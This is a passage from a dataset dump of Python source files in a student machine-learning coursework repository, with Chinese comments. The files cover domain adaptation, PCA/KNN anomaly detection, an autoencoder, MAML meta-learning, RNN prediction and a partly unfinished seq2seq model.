+= loss.item()\r\n loss.backward()\r\n optimizer_D.step()\r\n\r\n # Step 2 : 訓練Feature Extractor和Domain Classifier\r\n class_logits = label_predictor(feature[:source_data.shape[0]])\r\n domain_logits = domain_classifier(feature)\r\n # loss為原本的class CE - lamb * domain BCE,相減的原因同GAN中的Discriminator中的G loss。\r\n loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)\r\n running_F_loss += loss.item()\r\n loss.backward()\r\n optimizer_F.step()\r\n optimizer_C.step()\r\n\r\n optimizer_D.zero_grad()\r\n optimizer_F.zero_grad()\r\n optimizer_C.zero_grad()\r\n\r\n total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()\r\n total_num += source_data.shape[0]\r\n print(i, end='\\r')\r\n\r\n return running_D_loss / (i + 1), running_F_loss / (i + 1), total_hit / total_num\r\n\r\n\r\nif __name__ == '__main__':\r\n \"\"\"------数据预处理------\"\"\"\r\n source_transform = transforms.Compose([\r\n # 轉灰階: Canny 不吃 RGB。\r\n transforms.Grayscale(),\r\n # cv2 不吃 skimage.Image,因此轉成np.array後再做cv2.Canny\r\n transforms.Lambda(lambda x: cv2.Canny(np.array(x), 170, 300)),\r\n # 重新將np.array 轉回 skimage.Image\r\n transforms.ToPILImage(),\r\n # 水平翻轉 (Augmentation)\r\n transforms.RandomHorizontalFlip(),\r\n # 旋轉15度內 (Augmentation),旋轉後空的地方補0\r\n transforms.RandomRotation(15, fill=(0,)),\r\n # 最後轉成Tensor供model使用。\r\n transforms.ToTensor(),\r\n ])\r\n target_transform = transforms.Compose([\r\n # 轉灰階: 將輸入3維壓成1維。\r\n transforms.Grayscale(),\r\n # 縮放: 因為source data是32x32,我們將target data的28x28放大成32x32。\r\n transforms.Resize((32, 32)),\r\n # 水平翻轉 (Augmentation)\r\n transforms.RandomHorizontalFlip(),\r\n # 旋轉15度內 (Augmentation),旋轉後空的地方補0\r\n transforms.RandomRotation(15, fill=(0,)),\r\n # 最後轉成Tensor供model使用。\r\n transforms.ToTensor(),\r\n ])\r\n\r\n source_dataset = ImageFolder('./real_or_drawing/train_data', transform=source_transform)\r\n target_dataset = ImageFolder('./real_or_drawing/test_data', transform=target_transform)\r\n\r\n source_dataloader = DataLoader(source_dataset, batch_size=32, shuffle=True)\r\n target_dataloader = DataLoader(target_dataset, batch_size=32, shuffle=True)\r\n test_dataloader = DataLoader(target_dataset, batch_size=128, shuffle=False)\r\n\r\n # Pre-processing\r\n # 這裡我們選用Adam來當Optimizer。\r\n feature_extractor = FeatureExtractor().cuda()\r\n label_predictor = LabelPredictor().cuda()\r\n domain_classifier = DomainClassifier().cuda()\r\n\r\n class_criterion = nn.CrossEntropyLoss()\r\n domain_criterion = nn.BCEWithLogitsLoss()\r\n\r\n optimizer_F = optim.Adam(feature_extractor.parameters())\r\n optimizer_C = optim.Adam(label_predictor.parameters())\r\n optimizer_D = optim.Adam(domain_classifier.parameters())\r\n\r\n # 訓練200 epochs\r\n for epoch in range(200):\r\n train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)\r\n\r\n torch.save(feature_extractor.state_dict(), 'extractor_model.bin')\r\n torch.save(label_predictor.state_dict(), 'predictor_model.bin')\r\n\r\n print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss,\r\n train_F_loss, train_acc))\r\n"
},
{
"alpha_fraction": 0.6060606241226196,
"alphanum_fraction": 0.6159960031509399,
"avg_line_length": 37.47058868408203,
"blob_id": "075c5de904f9f7a4840bc47f2216b177aa9ca58f",
"content_id": "2c7c0f4463f236c81efd4e2c434001665dbfe42a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2229,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 51,
"path": "/hw10_anomaly_detection/data.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nfrom sklearn.cluster import MiniBatchKMeans\r\nfrom sklearn.metrics import f1_score, pairwise_distances, roc_auc_score\r\nfrom scipy.cluster.vq import vq, kmeans\r\nfrom sklearn.decomposition import PCA\r\n\r\n\"\"\"\r\n這份作業要執行的task是semi-supervised anomaly detection,\r\n也就是說training set是乾淨的,testing的時候才會混進outlier data(anomaly)。 \r\n我們以某個簡單的image dataset(image加上他們的label(分類))作為示範,\r\ntraining data為原先training set中的某幾類,而testing data則是原先testing set的所有data,\r\n要偵測的anomaly為training data中未出現的類別。label的部分,1為outlier data,而0為inlier data(相對於 outlier)。\r\n正確率以AUC計算。 方法則列舉3種: KNN, PCA, Autoencoder\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n train = np.load('./train.npy', allow_pickle=True)\r\n test = np.load('./test.npy', allow_pickle=True)\r\n\r\n task = 'pca'\r\n\r\n if task == 'knn':\r\n x = train.reshape(len(train), -1)\r\n y = test.reshape(len(test), -1)\r\n scores = list()\r\n for n in range(1, 10):\r\n kmeans_x = MiniBatchKMeans(n_clusters=n, batch_size=100).fit(x)\r\n y_cluster = kmeans_x.predict(y)\r\n y_dist = np.sum(np.square(kmeans_x.cluster_centers_[y_cluster] - y), axis=1)\r\n\r\n y_pred = y_dist\r\n # score = f1_score(y_label, y_pred, average='micro')\r\n # score = roc_auc_score(y_label, y_pred, average='micro')\r\n # scores.append(score)\r\n # print(np.max(scores), np.argmax(scores))\r\n # print(scores)\r\n # print('auc score: {}'.format(np.max(scores)))\r\n\r\n if task == 'pca':\r\n x = train.reshape(len(train), -1)\r\n y = test.reshape(len(test), -1)\r\n pca = PCA(n_components=2).fit(x)\r\n\r\n y_projected = pca.transform(y)\r\n y_reconstructed = pca.inverse_transform(y_projected)\r\n dist = np.sqrt(np.sum(np.square(y_reconstructed - y).reshape(len(y), -1), axis=1))\r\n\r\n y_pred = dist\r\n # score = roc_auc_score(y_label, y_pred, average='micro')\r\n # score = f1_score(y_label, y_pred, average='micro')\r\n # print('auc score: {}'.format(score))\r\n"
},
{
"alpha_fraction": 0.5449070334434509,
"alphanum_fraction": 0.573972225189209,
"avg_line_length": 29.561983108520508,
"blob_id": "5c5447b23dd433de83dfa13b279e7284ed2524d8",
"content_id": "c9da94cbe36a612909df266568fee4072ed02c5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4067,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 121,
"path": "/hw9_unsupervised/unsupervised.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nfrom torch.utils.data import Dataset\r\nfrom torch.utils.data import DataLoader\r\nimport random\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch import optim\r\n\r\n\r\ndef preprocess(image_list): # 將圖片的數值介於 0~255 的 int 線性轉為 0~1 的 float。\r\n \"\"\" Normalize Image and Permute (N,H,W,C) to (N,C,H,W)\r\n Args:\r\n image_list: List of images (9000, 32, 32, 3)\r\n Returns:\r\n image_list: List of images (9000, 3, 32, 32)\r\n \"\"\"\r\n image_list = np.array(image_list)\r\n image_list = np.transpose(image_list, (0, 3, 1, 2))\r\n image_list = (image_list / 255.0) * 2 - 1\r\n image_list = image_list.astype(np.float32)\r\n return image_list\r\n\r\n\r\nclass Image_Dataset(Dataset):\r\n def __init__(self, image_list):\r\n self.image_list = image_list\r\n def __len__(self):\r\n return len(self.image_list)\r\n def __getitem__(self, idx):\r\n images = self.image_list[idx]\r\n return images\r\n\r\n\r\ndef count_parameters(model, only_trainable=False): # 計算 model 參數量的(report 會用到)\r\n if only_trainable:\r\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\r\n else:\r\n return sum(p.numel() for p in model.parameters())\r\n\r\n\r\ndef same_seeds(seed): # 固定訓練的隨機種子(以便 reproduce)\r\n torch.manual_seed(seed)\r\n if torch.cuda.is_available():\r\n torch.cuda.manual_seed(seed)\r\n torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.\r\n np.random.seed(seed) # Numpy module.\r\n random.seed(seed) # Python random module.\r\n #torch.backends.cudnn.benchmark = False\r\n #torch.backends.cudnn.deterministic = True\r\n\r\n\r\nclass AE(nn.Module): # 定義我們的 baseline autoeocoder\r\n def __init__(self):\r\n super(AE, self).__init__()\r\n\r\n self.encoder = nn.Sequential(\r\n nn.Conv2d(3, 64, 3, stride=1, padding=1),\r\n nn.ReLU(True),\r\n nn.MaxPool2d(2),\r\n nn.Conv2d(64, 128, 3, stride=1, padding=1),\r\n nn.ReLU(True),\r\n nn.MaxPool2d(2),\r\n nn.Conv2d(128, 256, 3, stride=1, padding=1),\r\n nn.ReLU(True),\r\n nn.MaxPool2d(2)\r\n )\r\n\r\n self.decoder = nn.Sequential(\r\n nn.ConvTranspose2d(256, 128, 5, stride=1),\r\n nn.ReLU(True),\r\n nn.ConvTranspose2d(128, 64, 9, stride=1),\r\n nn.ReLU(True),\r\n nn.ConvTranspose2d(64, 3, 17, stride=1),\r\n nn.Tanh()\r\n )\r\n\r\n def forward(self, x):\r\n x1 = self.encoder(x)\r\n x = self.decoder(x1)\r\n return x1, x\r\n\r\n\r\nif __name__ == '__main__':\r\n trainX = np.load('./trainX_new.npy')\r\n trainX_preprocessed = preprocess(trainX)\r\n img_dataset = Image_Dataset(trainX_preprocessed)\r\n \"\"\"\r\n 這個部分就是主要的訓練階段。 我們先將準備好的 dataset 當作參數餵給 dataloader。 \r\n 將 dataloader、model、loss criterion、optimizer 都準備好之後,就可以開始訓練。 \r\n 訓練完成後,我們會將 model 存下來。\r\n \"\"\"\r\n model = AE()\r\n criterion = nn.MSELoss()\r\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-5, weight_decay=1e-5)\r\n\r\n model.train()\r\n n_epoch = 10\r\n\r\n same_seeds(0)\r\n # 準備 dataloader, model, loss criterion 和 optimizer\r\n img_dataloader = DataLoader(img_dataset, batch_size=8, shuffle=True)\r\n\r\n # 主要的訓練過程\r\n for epoch in range(n_epoch):\r\n for data in img_dataloader:\r\n img = data\r\n img = img\r\n\r\n output1, output = model(img)\r\n loss = criterion(output, img)\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n if (epoch + 1) % 10 == 0:\r\n torch.save(model.state_dict(), './checkpoints/checkpoint_{}.pth'.format(epoch + 1))\r\n\r\n print('epoch [{}/{}], loss:{:.5f}'.format(epoch + 1, n_epoch, loss.data))\r\n\r\n # 訓練完成後儲存 model\r\n torch.save(model.state_dict(), './checkpoints/last_checkpoint.pth')\r\n"
},
{
"alpha_fraction": 0.5405536890029907,
"alphanum_fraction": 0.5529383420944214,
"avg_line_length": 41.787235260009766,
"blob_id": "eab27b3a20dddcc895cff7db7e25fb2d5a2fb7b3",
"content_id": "e731953bcbdcce27a1d4d8dffe4101c87c946265",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4310,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 94,
"path": "/hw13_meta_learning/train.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nfrom torch import nn\r\nfrom torch.utils.data import DataLoader\r\nfrom tqdm import tqdm\r\nfrom hw13_meta.data import Omniglot\r\nfrom hw13_meta.model import Classifier, MAML\r\nimport numpy as np\r\n\r\n\r\ndef get_meta_batch(meta_batch_size, k_shot, q_query, data_loader, iterator):\r\n data = []\r\n for _ in range(meta_batch_size):\r\n try:\r\n task_data = iterator.next() # 一筆 task_data 就是一個 task 裡面的 data,大小是 [n_way, k_shot+q_query, 1, 28, 28]\r\n except StopIteration:\r\n iterator = iter(data_loader)\r\n task_data = iterator.next()\r\n train_data = task_data[:, :k_shot].reshape(-1, 1, 28, 28)\r\n val_data = task_data[:, k_shot:].reshape(-1, 1, 28, 28)\r\n task_data = torch.cat((train_data, val_data), 0)\r\n data.append(task_data)\r\n return torch.stack(data).cuda(), iterator\r\n\r\n\r\nif __name__ == '__main__':\r\n n_way = 5\r\n k_shot = 1\r\n q_query = 1\r\n inner_train_steps = 1\r\n inner_lr = 0.4\r\n meta_lr = 0.001\r\n meta_batch_size = 32\r\n max_epoch = 40\r\n eval_batches = test_batches = 20\r\n train_data_path = './Omniglot/images_background/'\r\n test_data_path = './Omniglot/images_evaluation/'\r\n\r\n dataset = Omniglot(train_data_path, k_shot, q_query)\r\n train_set, val_set = torch.utils.data.random_split(Omniglot(train_data_path, k_shot, q_query), [3200, 656])\r\n train_loader = DataLoader(train_set,\r\n batch_size=n_way, # 這裡的 batch size 並不是 meta batch size, 而是一個 task裡面會有多少不同的\r\n # characters,也就是 few-shot classifiecation 的 n_way\r\n num_workers=8,\r\n shuffle=True,\r\n drop_last=True)\r\n val_loader = DataLoader(val_set,\r\n batch_size=n_way,\r\n num_workers=8,\r\n shuffle=True,\r\n drop_last=True)\r\n test_loader = DataLoader(Omniglot(test_data_path, k_shot, q_query),\r\n batch_size=n_way,\r\n num_workers=8,\r\n shuffle=True,\r\n drop_last=True)\r\n train_iter = iter(train_loader)\r\n val_iter = iter(val_loader)\r\n test_iter = iter(test_loader)\r\n\r\n meta_model = Classifier(1, n_way).cuda()\r\n optimizer = torch.optim.Adam(meta_model.parameters(), lr=meta_lr)\r\n loss_fn = nn.CrossEntropyLoss().cuda()\r\n\r\n # 开始训练\r\n for epoch in range(max_epoch):\r\n print(\"Epoch %d\" % (epoch))\r\n train_meta_loss = []\r\n train_acc = []\r\n for step in tqdm(range(len(train_loader) // (meta_batch_size))): # 這裡的 step 是一次 meta-gradinet update step\r\n x, train_iter = get_meta_batch(meta_batch_size, k_shot, q_query, train_loader, train_iter)\r\n meta_loss, acc = MAML(meta_model, optimizer, x, n_way, k_shot, q_query, loss_fn)\r\n train_meta_loss.append(meta_loss.item())\r\n train_acc.append(acc)\r\n print(\" Loss : \", np.mean(train_meta_loss))\r\n print(\" Accuracy: \", np.mean(train_acc))\r\n\r\n # 每個 epoch 結束後,看看 validation accuracy 如何\r\n # 助教並沒有做 early stopping,同學如果覺得有需要是可以做的\r\n val_acc = []\r\n for eval_step in tqdm(range(len(val_loader) // (eval_batches))):\r\n x, val_iter = get_meta_batch(eval_batches, k_shot, q_query, val_loader, val_iter)\r\n _, acc = MAML(meta_model, optimizer, x, n_way, k_shot, q_query, loss_fn, inner_train_step=3,\r\n train=False) # testing時,我們更新三次 inner-step\r\n val_acc.append(acc)\r\n print(\" Validation accuracy: \", np.mean(val_acc))\r\n\r\n # 测试\r\n test_acc = []\r\n for test_step in tqdm(range(len(test_loader) // (test_batches))):\r\n x, val_iter = get_meta_batch(test_batches, k_shot, q_query, test_loader, test_iter)\r\n _, acc = MAML(meta_model, optimizer, x, n_way, k_shot, q_query, loss_fn, inner_train_step=3,\r\n train=False) # testing時,我們更新三次 inner-step\r\n test_acc.append(acc)\r\n print(\" Testing accuracy: \", np.mean(test_acc))\r\n\r\n"
},
{
"alpha_fraction": 0.6576673984527588,
"alphanum_fraction": 0.6598272323608398,
"avg_line_length": 33.61538314819336,
"blob_id": "731a4cec75b9fb10ce026e5c9bcbdd76d1f5ece9",
"content_id": "7fc0f580f87cb45a16031807498d0c16e868c854",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 966,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 26,
"path": "/hw13_meta_learning/data.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import glob\r\nimport numpy as np\r\nimport torch\r\nfrom PIL.Image import Image\r\nfrom torch.utils.data import Dataset\r\nfrom torchvision.transforms import transforms\r\n\r\n\r\nclass Omniglot(Dataset):\r\n def __init__(self, data_dir, k_way, q_query):\r\n self.file_list = [f for f in glob.glob(data_dir + \"**/character*\", recursive=True)]\r\n self.transform = transforms.Compose([transforms.ToTensor()])\r\n self.n = k_way + q_query\r\n\r\n def __getitem__(self, idx):\r\n sample = np.arange(20)\r\n np.random.shuffle(sample) # 這裡是為了等一下要 random sample 出我們要的 character\r\n img_path = self.file_list[idx]\r\n img_list = [f for f in glob.glob(img_path + \"**/*.png\", recursive=True)]\r\n img_list.sort()\r\n imgs = [self.transform(Image.open(img_file)) for img_file in img_list]\r\n imgs = torch.stack(imgs)[sample[:self.n]] # 每個 character,取出 k_way + q_query 個\r\n return imgs\r\n\r\n def __len__(self):\r\n return len(self.file_list)\r\n"
},
{
"alpha_fraction": 0.5838926434516907,
"alphanum_fraction": 0.5906040072441101,
"avg_line_length": 37.44117736816406,
"blob_id": "82dc8573e217f32b46cc05c95f0388c124122797",
"content_id": "7c569e7ee3e6dfa9dcac2afd8eefa1f6c53e4d10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1375,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 34,
"path": "/hw4RNN/predict.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# Predict and Write to csv file\r\nimport os\r\n\r\nimport pandas as pd\r\nimport torch\r\nfrom hw4RNN.data import TwitterDataset\r\nfrom hw4RNN.preprocess import Preprocess\r\nfrom hw4RNN.test import testing\r\nfrom hw4RNN.utils import load_testing_data\r\n\r\n\r\nif __name__ == '__main__':\r\n path_prefix = './'\r\n model_dir = './'\r\n # 開始測試模型並做預測\r\n print(\"loading testing data ...\")\r\n test_x = load_testing_data(path='../hw4_data/testing_data.txt')\r\n preprocess = Preprocess(test_x, sen_len, w2v_path=\"./w2v.model\")\r\n embedding = preprocess.make_embedding(load=True)\r\n test_x = preprocess.sentence_word2idx()\r\n test_dataset = TwitterDataset(X=test_x, y=None)\r\n test_loader = torch.utils.data.DataLoader(dataset = test_dataset,\r\n batch_size = batch_size,\r\n shuffle = False,\r\n num_workers = 8)\r\n print('\\nload model ...')\r\n model = torch.load(os.path.join(model_dir, 'ckpt.model'))\r\n outputs = testing(batch_size, test_loader, model, device)\r\n\r\n # 寫到csv檔案供上傳kaggle\r\n tmp = pd.DataFrame({\"id\":[str(i) for i in range(len(test_x))],\"label\":outputs})\r\n print(\"save csv ...\")\r\n tmp.to_csv(os.path.join(path_prefix, 'predict.csv'), index=False)\r\n print(\"Finish Predicting\")\r\n"
},
{
"alpha_fraction": 0.626151442527771,
"alphanum_fraction": 0.6347649097442627,
"avg_line_length": 37.79523849487305,
"blob_id": "72a872b23bce243bb8886c675edf2ccd0f9204ec",
"content_id": "23fba5fcce5954a0f2f4cc54ab739b4700e7d2e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10497,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 210,
"path": "/hw8_seq2seq/model.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nfrom torch import nn, random\r\n\r\nfrom hw8_seq2seq import config\r\n\r\n'''\r\nseq2seq模型的編碼器為RNN。 對於每個輸入,Encoder 會輸出一個向量和一個隱藏狀態(hidden state),並將隱藏狀態用於下一個輸入,換句話說,Encoder 會逐步讀取輸入序列,並輸出單個矢量(最終隱藏狀態)\r\n參數:\r\nen_vocab_size 是英文字典的大小,也就是英文的 subword 的個數\r\nemb_dim 是 embedding 的維度,主要將 one-hot vector 的單詞向量壓縮到指定的維度,主要是為了降維和濃縮資訊的功用,可以使用預先訓練好的 word embedding,如 Glove 和 word2vector\r\nhid_dim 是 RNN 輸出和隱藏狀態的維度\r\nn_layers 是 RNN 要疊多少層\r\ndropout 是決定有多少的機率會將某個節點變為 0,主要是為了防止 overfitting ,一般來說是在訓練時使用,測試時則不使用\r\nEncoder 的輸入和輸出:\r\n輸入:\r\n英文的整數序列 e.g. 1, 28, 29, 205, 2\r\n輸出:\r\noutputs: 最上層 RNN 全部的輸出,可以用 Attention 再進行處理\r\nhidden: 每層最後的隱藏狀態,將傳遞到 Decoder 進行解碼\r\n'''\r\nclass Encoder(nn.Module):\r\n def __init__(self, en_vocab_size, emb_dim, hid_dim, n_layers, dropout):\r\n super().__init__()\r\n self.embedding = nn.Embedding(en_vocab_size, emb_dim)\r\n self.hid_dim = hid_dim\r\n self.n_layers = n_layers\r\n self.rnn = nn.GRU(emb_dim, hid_dim, n_layers, dropout=dropout, batch_first=True, bidirectional=True)\r\n self.dropout = nn.Dropout(dropout)\r\n\r\n def forward(self, input):\r\n # input = [batch size, sequence len, vocab size]\r\n embedding = self.embedding(input)\r\n outputs, hidden = self.rnn(self.dropout(embedding))\r\n # outputs = [batch size, sequence len, hid dim * directions]\r\n # hidden = [num_layers * directions, batch size , hid dim]\r\n # outputs 是最上層RNN的輸出\r\n\r\n return outputs, hidden\r\n\r\n\r\n'''\r\nDecoder 是另一個 RNN,在最簡單的 seq2seq decoder 中,僅使用 Encoder 每一層最後的隱藏狀態來進行解碼,\r\n而這最後的隱藏狀態有時被稱為 “content vector”,因為可以想像它對整個前文序列進行編碼, \r\n此 “content vector” 用作 Decoder 的初始隱藏狀態, 而 Encoder 的輸出通常用於 Attention Mechanism。\r\n\r\n參數:\r\nen_vocab_size:英文字典的大小,也就是英文的 subword 的個數\r\nemb_dim:embedding 的維度,是用來將 one-hot vector 的單詞向量壓縮到指定的維度,主要是為了降維和濃縮資訊的功用,可以使用預先訓練好的 word embedding,如 Glove 和 word2vector\r\nhid_dim:RNN 輸出和隱藏狀態的維度\r\noutput_dim:最終輸出的維度,一般來說是將 hid_dim 轉到 one-hot vector 的單詞向量\r\nn_layers:RNN 要疊多少層\r\ndropout:決定有多少的機率會將某個節點變為0,主要是為了防止 overfitting ,一般來說是在訓練時使用,測試時則不用\r\nisatt:是來決定是否使用 Attention Mechanism\r\n\r\nDecoder 的輸入和輸出:\r\n輸入:前一次解碼出來的單詞的整數表示\r\n輸出:\r\nhidden: 根據輸入和前一次的隱藏狀態,現在的隱藏狀態更新的結果\r\noutput: 每個字有多少機率是這次解碼的結果\r\n'''\r\nclass Decoder(nn.Module):\r\n def __init__(self, cn_vocab_size, emb_dim, hid_dim, n_layers, dropout, isatt):\r\n super().__init__()\r\n self.cn_vocab_size = cn_vocab_size\r\n self.hid_dim = hid_dim * 2\r\n self.n_layers = n_layers\r\n self.embedding = nn.Embedding(cn_vocab_size, config.emb_dim)\r\n self.isatt = isatt\r\n self.attention = Attention(hid_dim)\r\n # 如果使用 Attention Mechanism 會使得輸入維度變化,請在這裡修改\r\n # e.g. Attention 接在輸入後面會使得維度變化,所以輸入維度改為\r\n # self.input_dim = emb_dim + hid_dim * 2 if isatt else emb_dim\r\n self.input_dim = emb_dim\r\n self.rnn = nn.GRU(self.input_dim, self.hid_dim, self.n_layers, dropout = dropout, batch_first=True)\r\n self.embedding2vocab1 = nn.Linear(self.hid_dim, self.hid_dim * 2)\r\n self.embedding2vocab2 = nn.Linear(self.hid_dim * 2, self.hid_dim * 4)\r\n self.embedding2vocab3 = nn.Linear(self.hid_dim * 4, self.cn_vocab_size)\r\n self.dropout = nn.Dropout(dropout)\r\n\r\n def forward(self, input, hidden, encoder_outputs):\r\n # input = [batch size, vocab size]\r\n # hidden = [batch size, n layers * directions, hid dim]\r\n # Decoder 只會是單向,所以 directions=1\r\n input = input.unsqueeze(1)\r\n embedded = self.dropout(self.embedding(input))\r\n # embedded = [batch size, 1, emb dim]\r\n if self.isatt:\r\n attn = self.attention(encoder_outputs, hidden)\r\n # TODO: 在這裡決定如何使用 Attention,e.g. 相加 或是 接在後面, 請注意維度變化\r\n output, hidden = self.rnn(embedded, hidden)\r\n # output = [batch size, 1, hid dim]\r\n # hidden = [num_layers, batch size, hid dim]\r\n\r\n # 將 RNN 的輸出轉為每個詞出現的機率\r\n output = self.embedding2vocab1(output.squeeze(1))\r\n output = self.embedding2vocab2(output)\r\n prediction = self.embedding2vocab3(output)\r\n # prediction = [batch size, vocab size]\r\n return prediction, hidden\r\n\r\n\r\n'''\r\n當輸入過長,或是單獨靠 “content vector” 無法取得整個輸入的意思時,用 Attention Mechanism 來提供 Decoder 更多的資訊。\r\n主要是根據現在 Decoder hidden state ,去計算在 Encoder outputs 中,那些與其有較高的關係,根據關系的數值來決定該傳給 Decoder 那些額外資訊。\r\n常見 Attention 的實作是用 Neural Network / Dot Product 來算 Decoder hidden state 和 Encoder outputs 之間的關係,\r\n再對所有算出來的數值做 softmax ,最後根據過完 softmax 的值對 Encoder outputs 做 weight sum。\r\nTODO: 實作 Attention Mechanism\r\n'''\r\nclass Attention(nn.Module):\r\n def __init__(self, hid_dim):\r\n super(Attention, self).__init__()\r\n self.hid_dim = hid_dim\r\n\r\n def forward(self, encoder_outputs, decoder_hidden):\r\n # encoder_outputs = [batch size, sequence len, hid dim * directions]\r\n # decoder_hidden = [num_layers, batch size, hid dim]\r\n # 一般來說是取最後一層的 hidden state 來做 attention\r\n ########\r\n # TODO #\r\n ########\r\n attention = None\r\n\r\n return attention\r\n\r\n\r\n'''\r\n由 Encoder 和 Decoder 組成\r\n接收輸入並傳給 Encoder\r\n將 Encoder 的輸出傳給 Decoder\r\n不斷地將 Decoder 的輸出傳回 Decoder ,進行解碼\r\n當解碼完成後,將 Decoder 的輸出傳回\r\n'''\r\nclass Seq2Seq(nn.Module):\r\n def __init__(self, encoder, decoder, device):\r\n super().__init__()\r\n self.encoder = encoder\r\n self.decoder = decoder\r\n self.device = device\r\n assert encoder.n_layers == decoder.n_layers, \\\r\n \"Encoder and decoder must have equal number of layers!\"\r\n\r\n def forward(self, input, target, teacher_forcing_ratio):\r\n # input = [batch size, input len, vocab size]\r\n # target = [batch size, target len, vocab size]\r\n # teacher_forcing_ratio 是有多少機率使用正確答案來訓練\r\n batch_size = target.shape[0]\r\n target_len = target.shape[1]\r\n vocab_size = self.decoder.cn_vocab_size\r\n\r\n # 準備一個儲存空間來儲存輸出\r\n outputs = torch.zeros(batch_size, target_len, vocab_size).to(self.device)\r\n # 將輸入放入 Encoder\r\n encoder_outputs, hidden = self.encoder(input)\r\n # Encoder 最後的隱藏層(hidden state) 用來初始化 Decoder\r\n # encoder_outputs 主要是使用在 Attention\r\n # 因為 Encoder 是雙向的RNN,所以需要將同一層兩個方向的 hidden state 接在一起\r\n # hidden = [num_layers * directions, batch size , hid dim] --> [num_layers, directions, batch size , hid dim]\r\n hidden = hidden.view(self.encoder.n_layers, 2, batch_size, -1)\r\n hidden = torch.cat((hidden[:, -2, :, :], hidden[:, -1, :, :]), dim=2)\r\n # 取的 <BOS> token\r\n input = target[:, 0]\r\n preds = []\r\n for t in range(1, target_len):\r\n output, hidden = self.decoder(input, hidden, encoder_outputs)\r\n outputs[:, t] = output\r\n # 決定是否用正確答案來做訓練\r\n teacher_force = random.random() <= teacher_forcing_ratio\r\n # 取出機率最大的單詞\r\n top1 = output.argmax(1)\r\n # 如果是 teacher force 則用正解訓練,反之用自己預測的單詞做預測\r\n input = target[:, t] if teacher_force and t < target_len else top1\r\n preds.append(top1.unsqueeze(1))\r\n preds = torch.cat(preds, 1)\r\n return outputs, preds\r\n\r\n def inference(self, input, target):\r\n ########\r\n # TODO #\r\n ########\r\n # 在這裡實施 Beam Search\r\n # 此函式的 batch size = 1\r\n # input = [batch size, input len, vocab size]\r\n # target = [batch size, target len, vocab size]\r\n batch_size = input.shape[0]\r\n input_len = input.shape[1] # 取得最大字數\r\n vocab_size = self.decoder.cn_vocab_size\r\n\r\n # 準備一個儲存空間來儲存輸出\r\n outputs = torch.zeros(batch_size, input_len, vocab_size).to(self.device)\r\n # 將輸入放入 Encoder\r\n encoder_outputs, hidden = self.encoder(input)\r\n # Encoder 最後的隱藏層(hidden state) 用來初始化 Decoder\r\n # encoder_outputs 主要是使用在 Attention\r\n # 因為 Encoder 是雙向的RNN,所以需要將同一層兩個方向的 hidden state 接在一起\r\n # hidden = [num_layers * directions, batch size , hid dim] --> [num_layers, directions, batch size , hid dim]\r\n hidden = hidden.view(self.encoder.n_layers, 2, batch_size, -1)\r\n hidden = torch.cat((hidden[:, -2, :, :], hidden[:, -1, :, :]), dim=2)\r\n # 取的 <BOS> token\r\n input = target[:, 0]\r\n preds = []\r\n for t in range(1, input_len):\r\n output, hidden = self.decoder(input, hidden, encoder_outputs)\r\n # 將預測結果存起來\r\n outputs[:, t] = output\r\n # 取出機率最大的單詞\r\n top1 = output.argmax(1)\r\n input = top1\r\n preds.append(top1.unsqueeze(1))\r\n preds = torch.cat(preds, 1)\r\n return outputs, preds\r\n\r\n"
},
{
"alpha_fraction": 0.49286988377571106,
"alphanum_fraction": 0.531194269657135,
"avg_line_length": 29.16666603088379,
"blob_id": "55f2136ada19807f0f20a0b84aaf8638340c8d6e",
"content_id": "2d16c3db7e17c025fce536d827310e9bf1035079",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1122,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 36,
"path": "/hw14_life_long_learning/draw.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
